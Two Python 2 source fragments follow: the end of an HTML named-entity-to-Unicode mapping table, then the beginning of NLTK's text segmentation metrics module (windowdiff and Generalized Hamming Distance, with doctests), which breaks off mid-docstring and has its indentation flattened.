u'omicron': u'\u03bf',
u'omid': u'\u29b6',
u'ominus': u'\u2296',
u'Oopf': '5\xd8F\xdd'.decode("utf-16-le"),
u'oopf': '5\xd8`\xdd'.decode("utf-16-le"),
u'opar': u'\u29b7',
u'OpenCurlyDoubleQuote': u'\u201c',
u'OpenCurlyQuote': u'\u2018',
u'operp': u'\u29b9',
u'oplus': u'\u2295',
u'Or': u'\u2a54',
u'or': u'\u2228',
u'orarr': u'\u21bb',
u'ord': u'\u2a5d',
u'order': u'\u2134',
u'orderof': u'\u2134',
u'ordf': u'\xaa',
u'ordm': u'\xba',
u'origof': u'\u22b6',
u'oror': u'\u2a56',
u'orslope': u'\u2a57',
u'orv': u'\u2a5b',
u'oS': u'\u24c8',
u'Oscr': '5\xd8\xaa\xdc'.decode("utf-16-le"),
u'oscr': u'\u2134',
u'Oslash': u'\xd8',
u'oslash': u'\xf8',
u'osol': u'\u2298',
u'Otilde': u'\xd5',
u'otilde': u'\xf5',
u'Otimes': u'\u2a37',
u'otimes': u'\u2297',
u'otimesas': u'\u2a36',
u'Ouml': u'\xd6',
u'ouml': u'\xf6',
u'ovbar': u'\u233d',
u'OverBar': u'\u203e',
u'OverBrace': u'\u23de',
u'OverBracket': u'\u23b4',
u'OverParenthesis': u'\u23dc',
u'par': u'\u2225',
u'para': u'\xb6',
u'parallel': u'\u2225',
u'parsim': u'\u2af3',
u'parsl': u'\u2afd',
u'part': u'\u2202',
u'PartialD': u'\u2202',
u'Pcy': u'\u041f',
u'pcy': u'\u043f',
u'percnt': u'%',
u'period': u'.',
u'permil': u'\u2030',
u'perp': u'\u22a5',
u'pertenk': u'\u2031',
u'Pfr': '5\xd8\x13\xdd'.decode("utf-16-le"),
u'pfr': '5\xd8-\xdd'.decode("utf-16-le"),
u'Phi': u'\u03a6',
u'phi': u'\u03c6',
u'phiv': u'\u03d5',
u'phmmat': u'\u2133',
u'phone': u'\u260e',
u'Pi': u'\u03a0',
u'pi': u'\u03c0',
u'pitchfork': u'\u22d4',
u'piv': u'\u03d6',
u'planck': u'\u210f',
u'planckh': u'\u210e',
u'plankv': u'\u210f',
u'plus': u'+',
u'plusacir': u'\u2a23',
u'plusb': u'\u229e',
u'pluscir': u'\u2a22',
u'plusdo': u'\u2214',
u'plusdu': u'\u2a25',
u'pluse': u'\u2a72',
u'PlusMinus': u'\xb1',
u'plusmn': u'\xb1',
u'plussim': u'\u2a26',
u'plustwo': u'\u2a27',
u'pm': u'\xb1',
u'Poincareplane': u'\u210c',
u'pointint': u'\u2a15',
u'Popf': u'\u2119',
u'popf': '5\xd8a\xdd'.decode("utf-16-le"),
u'pound': u'\xa3',
u'Pr': u'\u2abb',
u'pr': u'\u227a',
u'prap': u'\u2ab7',
u'prcue': u'\u227c',
u'prE': u'\u2ab3',
u'pre': u'\u2aaf',
u'prec': u'\u227a',
u'precapprox': u'\u2ab7',
u'preccurlyeq': u'\u227c',
u'Precedes': u'\u227a',
u'PrecedesEqual': u'\u2aaf',
u'PrecedesSlantEqual': u'\u227c',
u'PrecedesTilde': u'\u227e',
u'preceq': u'\u2aaf',
u'precnapprox': u'\u2ab9',
u'precneqq': u'\u2ab5',
u'precnsim': u'\u22e8',
u'precsim': u'\u227e',
u'Prime': u'\u2033',
u'prime': u'\u2032',
u'primes': u'\u2119',
u'prnap': u'\u2ab9',
u'prnE': u'\u2ab5',
u'prnsim': u'\u22e8',
u'prod': u'\u220f',
u'Product': u'\u220f',
u'profalar': u'\u232e',
u'profline': u'\u2312',
u'profsurf': u'\u2313',
u'prop': u'\u221d',
u'Proportion': u'\u2237',
u'Proportional': u'\u221d',
u'propto': u'\u221d',
u'prsim': u'\u227e',
u'prurel': u'\u22b0',
u'Pscr': '5\xd8\xab\xdc'.decode("utf-16-le"),
u'pscr': '5\xd8\xc5\xdc'.decode("utf-16-le"),
u'Psi': u'\u03a8',
u'psi': u'\u03c8',
u'puncsp': u'\u2008',
u'Qfr': '5\xd8\x14\xdd'.decode("utf-16-le"),
u'qfr': '5\xd8.\xdd'.decode("utf-16-le"),
u'qint': u'\u2a0c',
u'Qopf': u'\u211a',
u'qopf': '5\xd8b\xdd'.decode("utf-16-le"),
u'qprime': u'\u2057',
u'Qscr': '5\xd8\xac\xdc'.decode("utf-16-le"),
u'qscr': '5\xd8\xc6\xdc'.decode("utf-16-le"),
u'quaternions': u'\u210d',
u'quatint': u'\u2a16',
u'quest': u'?',
u'questeq': u'\u225f',
u'QUOT': u'"',
u'quot': u'"',
u'rAarr': u'\u21db',
u'race': u'\u223d\u0331',
u'Racute': u'\u0154',
u'racute': u'\u0155',
u'radic': u'\u221a',
u'raemptyv': u'\u29b3',
u'Rang': u'\u27eb',
u'rang': u'\u27e9',
u'rangd': u'\u2992',
u'range': u'\u29a5',
u'rangle': u'\u27e9',
u'raquo': u'\xbb',
u'Rarr': u'\u21a0',
u'rArr': u'\u21d2',
u'rarr': u'\u2192',
u'rarrap': u'\u2975',
u'rarrb': u'\u21e5',
u'rarrbfs': u'\u2920',
u'rarrc': u'\u2933',
u'rarrfs': u'\u291e',
u'rarrhk': u'\u21aa',
u'rarrlp': u'\u21ac',
u'rarrpl': u'\u2945',
u'rarrsim': u'\u2974',
u'Rarrtl': u'\u2916',
u'rarrtl': u'\u21a3',
u'rarrw': u'\u219d',
u'rAtail': u'\u291c',
u'ratail': u'\u291a',
u'ratio': u'\u2236',
u'rationals': u'\u211a',
u'RBarr': u'\u2910',
u'rBarr': u'\u290f',
u'rbarr': u'\u290d',
u'rbbrk': u'\u2773',
u'rbrace': u'}',
u'rbrack': u']',
u'rbrke': u'\u298c',
u'rbrksld': u'\u298e',
u'rbrkslu': u'\u2990',
u'Rcaron': u'\u0158',
u'rcaron': u'\u0159',
u'Rcedil': u'\u0156',
u'rcedil': u'\u0157',
u'rceil': u'\u2309',
u'rcub': u'}',
u'Rcy': u'\u0420',
u'rcy': u'\u0440',
u'rdca': u'\u2937',
u'rdldhar': u'\u2969',
u'rdquo': u'\u201d',
u'rdquor': u'\u201d',
u'rdsh': u'\u21b3',
u'Re': u'\u211c',
u'real': u'\u211c',
u'realine': u'\u211b',
u'realpart': u'\u211c',
u'reals': u'\u211d',
u'rect': u'\u25ad',
u'REG': u'\xae',
u'reg': u'\xae',
u'ReverseElement': u'\u220b',
u'ReverseEquilibrium': u'\u21cb',
u'ReverseUpEquilibrium': u'\u296f',
u'rfisht': u'\u297d',
u'rfloor': u'\u230b',
u'Rfr': u'\u211c',
u'rfr': '5\xd8/\xdd'.decode("utf-16-le"),
u'rHar': u'\u2964',
u'rhard': u'\u21c1',
u'rharu': u'\u21c0',
u'rharul': u'\u296c',
u'Rho': u'\u03a1',
u'rho': u'\u03c1',
u'rhov': u'\u03f1',
u'RightAngleBracket': u'\u27e9',
u'RightArrow': u'\u2192',
u'Rightarrow': u'\u21d2',
u'rightarrow': u'\u2192',
u'RightArrowBar': u'\u21e5',
u'RightArrowLeftArrow': u'\u21c4',
u'rightarrowtail': u'\u21a3',
u'RightCeiling': u'\u2309',
u'RightDoubleBracket': u'\u27e7',
u'RightDownTeeVector': u'\u295d',
u'RightDownVector': u'\u21c2',
u'RightDownVectorBar': u'\u2955',
u'RightFloor': u'\u230b',
u'rightharpoondown': u'\u21c1',
u'rightharpoonup': u'\u21c0',
u'rightleftarrows': u'\u21c4',
u'rightleftharpoons': u'\u21cc',
u'rightrightarrows': u'\u21c9',
u'rightsquigarrow': u'\u219d',
u'RightTee': u'\u22a2',
u'RightTeeArrow': u'\u21a6',
u'RightTeeVector': u'\u295b',
u'rightthreetimes': u'\u22cc',
u'RightTriangle': u'\u22b3',
u'RightTriangleBar': u'\u29d0',
u'RightTriangleEqual': u'\u22b5',
u'RightUpDownVector': u'\u294f',
u'RightUpTeeVector': u'\u295c',
u'RightUpVector': u'\u21be',
u'RightUpVectorBar': u'\u2954',
u'RightVector': u'\u21c0',
u'RightVectorBar': u'\u2953',
u'ring': u'\u02da',
u'risingdotseq': u'\u2253',
u'rlarr': u'\u21c4',
u'rlhar': u'\u21cc',
u'rlm': u'\u200f',
u'rmoust': u'\u23b1',
u'rmoustache': u'\u23b1',
u'rnmid': u'\u2aee',
u'roang': u'\u27ed',
u'roarr': u'\u21fe',
u'robrk': u'\u27e7',
u'ropar': u'\u2986',
u'Ropf': u'\u211d',
u'ropf': '5\xd8c\xdd'.decode("utf-16-le"),
u'roplus': u'\u2a2e',
u'rotimes': u'\u2a35',
u'RoundImplies': u'\u2970',
u'rpar': u')',
u'rpargt': u'\u2994',
u'rppolint': u'\u2a12',
u'rrarr': u'\u21c9',
u'Rrightarrow': u'\u21db',
u'rsaquo': u'\u203a',
u'Rscr': u'\u211b',
u'rscr': '5\xd8\xc7\xdc'.decode("utf-16-le"),
u'Rsh': u'\u21b1',
u'rsh': u'\u21b1',
u'rsqb': u']',
u'rsquo': u'\u2019',
u'rsquor': u'\u2019',
u'rthree': u'\u22cc',
u'rtimes': u'\u22ca',
u'rtri': u'\u25b9',
u'rtrie': u'\u22b5',
u'rtrif': u'\u25b8',
u'rtriltri': u'\u29ce',
u'RuleDelayed': u'\u29f4',
u'ruluhar': u'\u2968',
u'rx': u'\u211e',
u'Sacute': u'\u015a',
u'sacute': u'\u015b',
u'sbquo': u'\u201a',
u'Sc': u'\u2abc',
u'sc': u'\u227b',
u'scap': u'\u2ab8',
u'Scaron': u'\u0160',
u'scaron': u'\u0161',
u'sccue': u'\u227d',
u'scE': u'\u2ab4',
u'sce': u'\u2ab0',
u'Scedil': u'\u015e',
u'scedil': u'\u015f',
u'Scirc': u'\u015c',
u'scirc': u'\u015d',
u'scnap': u'\u2aba',
u'scnE': u'\u2ab6',
u'scnsim': u'\u22e9',
u'scpolint': u'\u2a13',
u'scsim': u'\u227f',
u'Scy': u'\u0421',
u'scy': u'\u0441',
u'sdot': u'\u22c5',
u'sdotb': u'\u22a1',
u'sdote': u'\u2a66',
u'searhk': u'\u2925',
u'seArr': u'\u21d8',
u'searr': u'\u2198',
u'searrow': u'\u2198',
u'sect': u'\xa7',
u'semi': u';',
u'seswar': u'\u2929',
u'setminus': u'\u2216',
u'setmn': u'\u2216',
u'sext': u'\u2736',
u'Sfr': '5\xd8\x16\xdd'.decode("utf-16-le"),
u'sfr': '5\xd80\xdd'.decode("utf-16-le"),
u'sfrown': u'\u2322',
u'sharp': u'\u266f',
u'SHCHcy': u'\u0429',
u'shchcy': u'\u0449',
u'SHcy': u'\u0428',
u'shcy': u'\u0448',
u'ShortDownArrow': u'\u2193',
u'ShortLeftArrow': u'\u2190',
u'shortmid': u'\u2223',
u'shortparallel': u'\u2225',
u'ShortRightArrow': u'\u2192',
u'ShortUpArrow': u'\u2191',
u'shy': u'\xad',
u'Sigma': u'\u03a3',
u'sigma': u'\u03c3',
u'sigmaf': u'\u03c2',
u'sigmav': u'\u03c2',
u'sim': u'\u223c',
u'simdot': u'\u2a6a',
u'sime': u'\u2243',
u'simeq': u'\u2243',
u'simg': u'\u2a9e',
u'simgE': u'\u2aa0',
u'siml': u'\u2a9d',
u'simlE': u'\u2a9f',
u'simne': u'\u2246',
u'simplus': u'\u2a24',
u'simrarr': u'\u2972',
u'slarr': u'\u2190',
u'SmallCircle': u'\u2218',
u'smallsetminus': u'\u2216',
u'smashp': u'\u2a33',
u'smeparsl': u'\u29e4',
u'smid': u'\u2223',
u'smile': u'\u2323',
u'smt': u'\u2aaa',
u'smte': u'\u2aac',
u'smtes': u'\u2aac\ufe00',
u'SOFTcy': u'\u042c',
u'softcy': u'\u044c',
u'sol': u'/',
u'solb': u'\u29c4',
u'solbar': u'\u233f',
u'Sopf': '5\xd8J\xdd'.decode("utf-16-le"),
u'sopf': '5\xd8d\xdd'.decode("utf-16-le"),
u'spades': u'\u2660',
u'spadesuit': u'\u2660',
u'spar': u'\u2225',
u'sqcap': u'\u2293',
u'sqcaps': u'\u2293\ufe00',
u'sqcup': u'\u2294',
u'sqcups': u'\u2294\ufe00',
u'Sqrt': u'\u221a',
u'sqsub': u'\u228f',
u'sqsube': u'\u2291',
u'sqsubset': u'\u228f',
u'sqsubseteq': u'\u2291',
u'sqsup': u'\u2290',
u'sqsupe': u'\u2292',
u'sqsupset': u'\u2290',
u'sqsupseteq': u'\u2292',
u'squ': u'\u25a1',
u'Square': u'\u25a1',
u'square': u'\u25a1',
u'SquareIntersection': u'\u2293',
u'SquareSubset': u'\u228f',
u'SquareSubsetEqual': u'\u2291',
u'SquareSuperset': u'\u2290',
u'SquareSupersetEqual': u'\u2292',
u'SquareUnion': u'\u2294',
u'squarf': u'\u25aa',
u'squf': u'\u25aa',
u'srarr': u'\u2192',
u'Sscr': '5\xd8\xae\xdc'.decode("utf-16-le"),
u'sscr': '5\xd8\xc8\xdc'.decode("utf-16-le"),
u'ssetmn': u'\u2216',
u'ssmile': u'\u2323',
u'sstarf': u'\u22c6',
u'Star': u'\u22c6',
u'star': u'\u2606',
u'starf': u'\u2605',
u'straightepsilon': u'\u03f5',
u'straightphi': u'\u03d5',
u'strns': u'\xaf',
u'Sub': u'\u22d0',
u'sub': u'\u2282',
u'subdot': u'\u2abd',
u'subE': u'\u2ac5',
u'sube': u'\u2286',
u'subedot': u'\u2ac3',
u'submult': u'\u2ac1',
u'subnE': u'\u2acb',
u'subne': u'\u228a',
u'subplus': u'\u2abf',
u'subrarr': u'\u2979',
u'Subset': u'\u22d0',
u'subset': u'\u2282',
u'subseteq': u'\u2286',
u'subseteqq': u'\u2ac5',
u'SubsetEqual': u'\u2286',
u'subsetneq': u'\u228a',
u'subsetneqq': u'\u2acb',
u'subsim': u'\u2ac7',
u'subsub': u'\u2ad5',
u'subsup': u'\u2ad3',
u'succ': u'\u227b',
u'succapprox': u'\u2ab8',
u'succcurlyeq': u'\u227d',
u'Succeeds': u'\u227b',
u'SucceedsEqual': u'\u2ab0',
u'SucceedsSlantEqual': u'\u227d',
u'SucceedsTilde': u'\u227f',
u'succeq': u'\u2ab0',
u'succnapprox': u'\u2aba',
u'succneqq': u'\u2ab6',
u'succnsim': u'\u22e9',
u'succsim': u'\u227f',
u'SuchThat': u'\u220b',
u'Sum': u'\u2211',
u'sum': u'\u2211',
u'sung': u'\u266a',
u'sup1': u'\xb9',
u'sup2': u'\xb2',
u'sup3': u'\xb3',
u'Sup': u'\u22d1',
u'sup': u'\u2283',
u'supdot': u'\u2abe',
u'supdsub': u'\u2ad8',
u'supE': u'\u2ac6',
u'supe': u'\u2287',
u'supedot': u'\u2ac4',
u'Superset': u'\u2283',
u'SupersetEqual': u'\u2287',
u'suphsol': u'\u27c9',
u'suphsub': u'\u2ad7',
u'suplarr': u'\u297b',
u'supmult': u'\u2ac2',
u'supnE': u'\u2acc',
u'supne': u'\u228b',
u'supplus': u'\u2ac0',
u'Supset': u'\u22d1',
u'supset': u'\u2283',
u'supseteq': u'\u2287',
u'supseteqq': u'\u2ac6',
u'supsetneq': u'\u228b',
u'supsetneqq': u'\u2acc',
u'supsim': u'\u2ac8',
u'supsub': u'\u2ad4',
u'supsup': u'\u2ad6',
u'swarhk': u'\u2926',
u'swArr': u'\u21d9',
u'swarr': u'\u2199',
u'swarrow': u'\u2199',
u'swnwar': u'\u292a',
u'szlig': u'\xdf',
u'Tab': u'\t',
u'target': u'\u2316',
u'Tau': u'\u03a4',
u'tau': u'\u03c4',
u'tbrk': u'\u23b4',
u'Tcaron': u'\u0164',
u'tcaron': u'\u0165',
u'Tcedil': u'\u0162',
u'tcedil': u'\u0163',
u'Tcy': u'\u0422',
u'tcy': u'\u0442',
u'tdot': u'\u20db',
u'telrec': u'\u2315',
u'Tfr': '5\xd8\x17\xdd'.decode("utf-16-le"),
u'tfr': '5\xd81\xdd'.decode("utf-16-le"),
u'there4': u'\u2234',
u'Therefore': u'\u2234',
u'therefore': u'\u2234',
u'Theta': u'\u0398',
u'theta': u'\u03b8',
u'thetasym': u'\u03d1',
u'thetav': u'\u03d1',
u'thickapprox': u'\u2248',
u'thicksim': u'\u223c',
u'ThickSpace': u'\u205f\u200a',
u'thinsp': u'\u2009',
u'ThinSpace': u'\u2009',
u'thkap': u'\u2248',
u'thksim': u'\u223c',
u'THORN': u'\xde',
u'thorn': u'\xfe',
u'Tilde': u'\u223c',
u'tilde': u'\u02dc',
u'TildeEqual': u'\u2243',
u'TildeFullEqual': u'\u2245',
u'TildeTilde': u'\u2248',
u'times': u'\xd7',
u'timesb': u'\u22a0',
u'timesbar': u'\u2a31',
u'timesd': u'\u2a30',
u'tint': u'\u222d',
u'toea': u'\u2928',
u'top': u'\u22a4',
u'topbot': u'\u2336',
u'topcir': u'\u2af1',
u'Topf': '5\xd8K\xdd'.decode("utf-16-le"),
u'topf': '5\xd8e\xdd'.decode("utf-16-le"),
u'topfork': u'\u2ada',
u'tosa': u'\u2929',
u'tprime': u'\u2034',
u'TRADE': u'\u2122',
u'trade': u'\u2122',
u'triangle': u'\u25b5',
u'triangledown': u'\u25bf',
u'triangleleft': u'\u25c3',
u'trianglelefteq': u'\u22b4',
u'triangleq': u'\u225c',
u'triangleright': u'\u25b9',
u'trianglerighteq': u'\u22b5',
u'tridot': u'\u25ec',
u'trie': u'\u225c',
u'triminus': u'\u2a3a',
u'TripleDot': u'\u20db',
u'triplus': u'\u2a39',
u'trisb': u'\u29cd',
u'tritime': u'\u2a3b',
u'trpezium': u'\u23e2',
u'Tscr': '5\xd8\xaf\xdc'.decode("utf-16-le"),
u'tscr': '5\xd8\xc9\xdc'.decode("utf-16-le"),
u'TScy': u'\u0426',
u'tscy': u'\u0446',
u'TSHcy': u'\u040b',
u'tshcy': u'\u045b',
u'Tstrok': u'\u0166',
u'tstrok': u'\u0167',
u'twixt': u'\u226c',
u'twoheadleftarrow': u'\u219e',
u'twoheadrightarrow': u'\u21a0',
u'Uacute': u'\xda',
u'uacute': u'\xfa',
u'Uarr': u'\u219f',
u'uArr': u'\u21d1',
u'uarr': u'\u2191',
u'Uarrocir': u'\u2949',
u'Ubrcy': u'\u040e',
u'ubrcy': u'\u045e',
u'Ubreve': u'\u016c',
u'ubreve': u'\u016d',
u'Ucirc': u'\xdb',
u'ucirc': u'\xfb',
u'Ucy': u'\u0423',
u'ucy': u'\u0443',
u'udarr': u'\u21c5',
u'Udblac': u'\u0170',
u'udblac': u'\u0171',
u'udhar': u'\u296e',
u'ufisht': u'\u297e',
u'Ufr': '5\xd8\x18\xdd'.decode("utf-16-le"),
u'ufr': '5\xd82\xdd'.decode("utf-16-le"),
u'Ugrave': u'\xd9',
u'ugrave': u'\xf9',
u'uHar': u'\u2963',
u'uharl': u'\u21bf',
u'uharr': u'\u21be',
u'uhblk': u'\u2580',
u'ulcorn': u'\u231c',
u'ulcorner': u'\u231c',
u'ulcrop': u'\u230f',
u'ultri': u'\u25f8',
u'Umacr': u'\u016a',
u'umacr': u'\u016b',
u'uml': u'\xa8',
u'UnderBar': u'_',
u'UnderBrace': u'\u23df',
u'UnderBracket': u'\u23b5',
u'UnderParenthesis': u'\u23dd',
u'Union': u'\u22c3',
u'UnionPlus': u'\u228e',
u'Uogon': u'\u0172',
u'uogon': u'\u0173',
u'Uopf': '5\xd8L\xdd'.decode("utf-16-le"),
u'uopf': '5\xd8f\xdd'.decode("utf-16-le"),
u'UpArrow': u'\u2191',
u'Uparrow': u'\u21d1',
u'uparrow': u'\u2191',
u'UpArrowBar': u'\u2912',
u'UpArrowDownArrow': u'\u21c5',
u'UpDownArrow': u'\u2195',
u'Updownarrow': u'\u21d5',
u'updownarrow': u'\u2195',
u'UpEquilibrium': u'\u296e',
u'upharpoonleft': u'\u21bf',
u'upharpoonright': u'\u21be',
u'uplus': u'\u228e',
u'UpperLeftArrow': u'\u2196',
u'UpperRightArrow': u'\u2197',
u'Upsi': u'\u03d2',
u'upsi': u'\u03c5',
u'upsih': u'\u03d2',
u'Upsilon': u'\u03a5',
u'upsilon': u'\u03c5',
u'UpTee': u'\u22a5',
u'UpTeeArrow': u'\u21a5',
u'upuparrows': u'\u21c8',
u'urcorn': u'\u231d',
u'urcorner': u'\u231d',
u'urcrop': u'\u230e',
u'Uring': u'\u016e',
u'uring': u'\u016f',
u'urtri': u'\u25f9',
u'Uscr': '5\xd8\xb0\xdc'.decode("utf-16-le"),
u'uscr': '5\xd8\xca\xdc'.decode("utf-16-le"),
u'utdot': u'\u22f0',
u'Utilde': u'\u0168',
u'utilde': u'\u0169',
u'utri': u'\u25b5',
u'utrif': u'\u25b4',
u'uuarr': u'\u21c8',
u'Uuml': u'\xdc',
u'uuml': u'\xfc',
u'uwangle': u'\u29a7',
u'vangrt': u'\u299c',
u'varepsilon': u'\u03f5',
u'varkappa': u'\u03f0',
u'varnothing': u'\u2205',
u'varphi': u'\u03d5',
u'varpi': u'\u03d6',
u'varpropto': u'\u221d',
u'vArr': u'\u21d5',
u'varr': u'\u2195',
u'varrho': u'\u03f1',
u'varsigma': u'\u03c2',
u'varsubsetneq': u'\u228a\ufe00',
u'varsubsetneqq': u'\u2acb\ufe00',
u'varsupsetneq': u'\u228b\ufe00',
u'varsupsetneqq': u'\u2acc\ufe00',
u'vartheta': u'\u03d1',
u'vartriangleleft': u'\u22b2',
u'vartriangleright': u'\u22b3',
u'Vbar': u'\u2aeb',
u'vBar': u'\u2ae8',
u'vBarv': u'\u2ae9',
u'Vcy': u'\u0412',
u'vcy': u'\u0432',
u'VDash': u'\u22ab',
u'Vdash': u'\u22a9',
u'vDash': u'\u22a8',
u'vdash': u'\u22a2',
u'Vdashl': u'\u2ae6',
u'Vee': u'\u22c1',
u'vee': u'\u2228',
u'veebar': u'\u22bb',
u'veeeq': u'\u225a',
u'vellip': u'\u22ee',
u'Verbar': u'\u2016',
u'verbar': u'|',
u'Vert': u'\u2016',
u'vert': u'|',
u'VerticalBar': u'\u2223',
u'VerticalLine': u'|',
u'VerticalSeparator': u'\u2758',
u'VerticalTilde': u'\u2240',
u'VeryThinSpace': u'\u200a',
u'Vfr': '5\xd8\x19\xdd'.decode("utf-16-le"),
u'vfr': '5\xd83\xdd'.decode("utf-16-le"),
u'vltri': u'\u22b2',
u'vnsub': u'\u2282\u20d2',
u'vnsup': u'\u2283\u20d2',
u'Vopf': '5\xd8M\xdd'.decode("utf-16-le"),
u'vopf': '5\xd8g\xdd'.decode("utf-16-le"),
u'vprop': u'\u221d',
u'vrtri': u'\u22b3',
u'Vscr': '5\xd8\xb1\xdc'.decode("utf-16-le"),
u'vscr': '5\xd8\xcb\xdc'.decode("utf-16-le"),
u'vsubnE': u'\u2acb\ufe00',
u'vsubne': u'\u228a\ufe00',
u'vsupnE': u'\u2acc\ufe00',
u'vsupne': u'\u228b\ufe00',
u'Vvdash': u'\u22aa',
u'vzigzag': u'\u299a',
u'Wcirc': u'\u0174',
u'wcirc': u'\u0175',
u'wedbar': u'\u2a5f',
u'Wedge': u'\u22c0',
u'wedge': u'\u2227',
u'wedgeq': u'\u2259',
u'weierp': u'\u2118',
u'Wfr': '5\xd8\x1a\xdd'.decode("utf-16-le"),
u'wfr': '5\xd84\xdd'.decode("utf-16-le"),
u'Wopf': '5\xd8N\xdd'.decode("utf-16-le"),
u'wopf': '5\xd8h\xdd'.decode("utf-16-le"),
u'wp': u'\u2118',
u'wr': u'\u2240',
u'wreath': u'\u2240',
u'Wscr': '5\xd8\xb2\xdc'.decode("utf-16-le"),
u'wscr': '5\xd8\xcc\xdc'.decode("utf-16-le"),
u'xcap': u'\u22c2',
u'xcirc': u'\u25ef',
u'xcup': u'\u22c3',
u'xdtri': u'\u25bd',
u'Xfr': '5\xd8\x1b\xdd'.decode("utf-16-le"),
u'xfr': '5\xd85\xdd'.decode("utf-16-le"),
u'xhArr': u'\u27fa',
u'xharr': u'\u27f7',
u'Xi': u'\u039e',
u'xi': u'\u03be',
u'xlArr': u'\u27f8',
u'xlarr': u'\u27f5',
u'xmap': u'\u27fc',
u'xnis': u'\u22fb',
u'xodot': u'\u2a00',
u'Xopf': '5\xd8O\xdd'.decode("utf-16-le"),
u'xopf': '5\xd8i\xdd'.decode("utf-16-le"),
u'xoplus': u'\u2a01',
u'xotime': u'\u2a02',
u'xrArr': u'\u27f9',
u'xrarr': u'\u27f6',
u'Xscr': '5\xd8\xb3\xdc'.decode("utf-16-le"),
u'xscr': '5\xd8\xcd\xdc'.decode("utf-16-le"),
u'xsqcup': u'\u2a06',
u'xuplus': u'\u2a04',
u'xutri': u'\u25b3',
u'xvee': u'\u22c1',
u'xwedge': u'\u22c0',
u'Yacute': u'\xdd',
u'yacute': u'\xfd',
u'YAcy': u'\u042f',
u'yacy': u'\u044f',
u'Ycirc': u'\u0176',
u'ycirc': u'\u0177',
u'Ycy': u'\u042b',
u'ycy': u'\u044b',
u'yen': u'\xa5',
u'Yfr': '5\xd8\x1c\xdd'.decode("utf-16-le"),
u'yfr': '5\xd86\xdd'.decode("utf-16-le"),
u'YIcy': u'\u0407',
u'yicy': u'\u0457',
u'Yopf': '5\xd8P\xdd'.decode("utf-16-le"),
u'yopf': '5\xd8j\xdd'.decode("utf-16-le"),
u'Yscr': '5\xd8\xb4\xdc'.decode("utf-16-le"),
u'yscr': '5\xd8\xce\xdc'.decode("utf-16-le"),
u'YUcy': u'\u042e',
u'yucy': u'\u044e',
u'yuml': u'\xff',
u'Yuml': u'\u0178',
u'Zacute': u'\u0179',
u'zacute': u'\u017a',
u'Zcaron': u'\u017d',
u'zcaron': u'\u017e',
u'Zcy': u'\u0417',
u'zcy': u'\u0437',
u'Zdot': u'\u017b',
u'zdot': u'\u017c',
u'zeetrf': u'\u2128',
u'ZeroWidthSpace': u'\u200b',
u'Zeta': u'\u0396',
u'zeta': u'\u03b6',
u'Zfr': u'\u2128',
u'zfr': '5\xd87\xdd'.decode("utf-16-le"),
u'ZHcy': u'\u0416',
u'zhcy': u'\u0436',
u'zigrarr': u'\u21dd',
u'Zopf': u'\u2124',
u'zopf': '5\xd8k\xdd'.decode("utf-16-le"),
u'Zscr': '5\xd8\xb5\xdc'.decode("utf-16-le"),
u'zscr': '5\xd8\xcf\xdc'.decode("utf-16-le"),
u'zwj': u'\u200d',
u'zwnj': u'\u200c',
}
|
|
# Natural Language Toolkit: Text Segmentation Metrics
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au>
# David Doukhan <david.doukhan@gmail.com>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Text Segmentation Metrics
1. Windowdiff
Pevzner, L., and Hearst, M., A Critique and Improvement of
an Evaluation Metric for Text Segmentation,
Computational Linguistics 28, 19-36
2. Generalized Hamming Distance
Bookstein A., Kulyukin V.A., Raita T.
Generalized Hamming Distance
Information Retrieval 5, 2002, pp 353-375
Baseline implementation in C++
http://digital.cs.usu.edu/~vkulyukin/vkweb/software/ghd/ghd.html
Study describing benefits of Generalized Hamming Distance Versus
WindowDiff for evaluating text segmentation tasks
Begsten, Y. Quel indice pour mesurer l'efficacite en segmentation de textes ?
TALN 2009
3. Pk text segmentation metric
Beeferman D., Berger A., Lafferty J. (1999)
Statistical Models for Text Segmentation
Machine Learning, 34, 177-210
"""
import numpy
def windowdiff(seg1, seg2, k, boundary="1"):
"""
Compute the windowdiff score for a pair of segmentations. A
segmentation is any sequence over a vocabulary of two items
(e.g. "0", "1"), where the specified boundary value is used to
mark the edge of a segmentation.
>>> s1 = "00000010000000001000000"
>>> s2 = "00000001000000010000000"
>>> s3 = "00010000000000000001000"
>>> windowdiff(s1, s1, 3)
0
>>> windowdiff(s1, s2, 3)
4
>>> windowdiff(s2, s3, 3)
16
:param seg1: a segmentation
:type seg1: str or list
:param seg2: a segmentation
:type seg2: str or list
:param k: window width
:type k: int
:param boundary: boundary value
:type boundary: str or int or bool
:rtype: int
"""
if len(seg1) != len(seg2):
raise ValueError("Segmentations have unequal length")
wd = 0
for i in range(len(seg1) - k):
wd += abs(seg1[i:i+k+1].count(boundary) - seg2[i:i+k+1].count(boundary))
return wd
# Generalized Hamming Distance
def _init_mat(nrows, ncols, ins_cost, del_cost):
mat = numpy.empty((nrows, ncols))
mat[0, :] = [x * ins_cost for x in xrange(ncols)]
mat[:, 0] = [x * del_cost for x in xrange(nrows)]
return mat
def _ghd_aux(mat, rowv, colv, ins_cost, del_cost, shift_cost_coeff):
for i, rowi in enumerate(rowv):
for j, colj in enumerate(colv):
shift_cost = shift_cost_coeff * abs(rowi - colj) + mat[i, j]
if rowi == colj:
# boundaries are at the same location, no transformation required
tcost = mat[i, j]
elif rowi > colj:
# boundary match through a deletion
tcost = del_cost + mat[i, j + 1]
else:
# boundary match through an insertion
tcost = ins_cost + mat[i + 1, j]
mat[i + 1, j + 1] = min(tcost, shift_cost)
def ghd(ref, hyp, ins_cost=2.0, del_cost=2.0, shift_cost_coeff=1.0, boundary='1'):
"""
Compute the Generalized Hamming Distance for a reference and a hypothetical
segmentation, corresponding to the cost related to the transformation
of the hypothetical segmentation into the reference segmentation
through boundary insertion, deletion and shift operations.
A segmentation is any sequence over a vocabulary of two items
(e.g. "0", "1"), where the specified boundary value is used to
mark the edge of a segmentation.
Recommended parameter values are a shift_cost_coeff of 2.
Associated with a ins_cost, and del_cost equal to the mean segment
length in the reference segmentation.
>>> # Same examples as Kulyukin C++ implementation
>>> ghd('1100100000', '1100010000', 1.0, 1.0, 0.5)
0.5
>>> ghd('1100100000', '1100000001', 1.0, 1.0, 0.5)
2.0
>>> ghd('011', '110', 1.0, 1.0, 0.5)
1.0
>>> ghd('1', '0', 1.0, 1.0, 0.5)
1.0
>>> ghd('111', '000', 1.0, 1.0, 0.5)
3.0
>>> ghd('000', '111', 1.0, 2.0, 0.5)
6.0
:param ref: the reference segmentation
:type ref: str or list
